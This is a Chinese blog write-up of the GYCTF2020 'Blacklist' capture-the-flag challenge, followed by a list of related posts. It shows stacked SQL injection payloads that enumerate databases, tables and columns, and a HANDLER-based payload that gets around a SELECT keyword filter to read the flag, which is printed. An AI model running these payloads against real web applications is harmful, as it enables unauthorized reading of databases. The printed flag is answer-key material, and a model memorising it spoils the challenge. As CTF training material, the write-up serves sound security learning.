首页 > 其他分享 >[GYCTF2020]Blacklist 1

[GYCTF2020]Blacklist 1

时间:2024-11-13 11:42:13浏览次数:1  
标签:tables use FlagHere show GYCTF2020 Blacklist flag inject

[GYCTF2020]Blacklist 1

打开实例发现get提交框,提交1发现显示

image-20241113111242240

尝试万能密码无果

image-20241113111333443

尝试联合注入,显示出了过滤规则,可以见到很多关键字都被过滤了

image-20241113112041177

尝试堆叠注入,成功显示出数据表

?inject=1';show databases;

image-20241113112513384

查表

?inject=1';use ctftraining;show tables;

看到了个FLAG_TABLE

image-20241113112759558

查字段

?inject=1';use ctftraining;show tables;show columns from FLAG_TABLE;

image-20241113113128056

这边显示not_flag,靠背了又查错表了

重新查询supersqli

?inject=1';use supersqli;show tables;

image-20241113113306965

看到FlagHere,这次准没错了

查字段

?inject=1';use supersqli;show tables;show columns from FlagHere;

image-20241113113412259

看到flag的列,但是未能显示出flag

这边因为select等字段被过滤的原因,所以并不能采用直接select的方式进行查询,所以思考片刻决定采用handler进行查询

构造payload:

?inject=1';use supersqli;HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;

成功获取到flag

image-20241113114313166

flag{40d647f8-9b46-4d91-82d1-d15815fab409}

标签:tables,use,FlagHere,show,GYCTF2020,Blacklist,flag,inject
From: https://www.cnblogs.com/tazmi/p/18543586

相关文章

  • [GYCTF2020]Blacklist
    题目链接:[GYCTF2020]Blacklist。打开环境后如下所示。尝试输入1,回显如下。输入'后发现存在报错。尝试使用联合注入,发现存在检测select等关键词。因此尝试下堆叠注入。首先是查询数据库。Payload:0'%3bshow+databases%3b%23。其次是查询当前数据库存在什么表。Pa......
  • 代码审计[二] [GYCTF2020]Easyphp
    代码审计做的好难受的一道反序列化[GYCTF2020]Easyphp参考[GYCTF2020]Easyphp-CSDN博客查看整个网站,尝试弱口令登录,不行。猜网页,register、upload都试了一下,发现www.zip可以下载网页源码。login.php<?phprequire_once('lib.php');?><?php$user=newuser();if(isset($_......
  • [GYCTF2020]Node Game及知识点
    ......
  • 【BUUCTF】Blacklist
    【BUUCTF】Blacklist(SQL注入)题目来源收录于:BUUCTFGYCTF2020题目描述纯粹的SQL注入题当触发黑名单时返回如下过滤了以下关键字setpreparealterrenameselectupdatedeletedropinsertwhere.题解发现可以进行堆叠注入?inject=1';showdatabases;爆表......
  • [GYCTF2020]FlaskApp (pin码,jinja2绕过注入)
    题目就是flask下面是判断模版注入的方法a{*comment*}b和{{7*'7'}}base64编码后解码都报错no,无法判断模版引擎直接用下jinja2的试一试,把编码后的密文拿去解码,payload:{{"".__class__mro(2)__subclasses__()}}报错是jinja2后面就整不会了,看别人的wp整理一下:由于不......
  • [GYCTF2020]Blacklist
    [GYCTF2020]BlacklistStep1输入1,回显:array(2){[0]=>string(1)"1"[1]=>string(7)"hahahah"}稍微尝试注入:/?inject=1'+union+select+1,2,3;#回显:returnpreg_match("/set|prepare|alter|rename|select|update|delete|dro......
  • 使用ublacklist屏蔽某度
    谷歌浏览器,已升级到最新版,uBlacklist插件也已安装设置如下:内容:baidu.com*://*.baidu.com/*tieba.baidu.com*.baidu.*/勾选要启用的搜索引擎:启用后效果如下:点开发现确实屏蔽掉某度了,感觉整个世界瞬间清净晒:惜秦皇汉武,略输文采;唐宗宋祖,稍逊风骚~冯唐易老,李广难封。......
  • [GYCTF2020]Ez_Express 1
    原型链污染,信息收集,命令执行,代码审计这个题我在做之前学了p神的教程https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html打开后可以发现是一个登录界面,之后我们先进行信息收集找到了www.zip这个文件,然后得到了源码index.jsvarexpress=req......
  • [GYCTF2020]EasyThinking 1
    think模板,6.0特性因为题目已经很明确给我们了hint,直接尝试查看特性发现这里是任意文件写入的hint具体可以查看https://www.freebuf.com/vuls/352360.html这里我们直接进行账号注册因为他是根据cookie的名称进行定义文件名称的所以我们可以直接写文件名,这里的文件名长度要求......
  • BUUCTF---web---[GYCTF2020]Blacklist
    1、来到题目连接页面2、测试单引号和双引号,单引号报错,双引号没报错1'1"3、使用万能句式4、使用堆叠注入测试,查看数据库名1';showdatabases;# 5、查看表名1';showtables;#6、查看FlagHere中字段名1';showcolumnsfromFlagHere;#  7、查看flag字段中......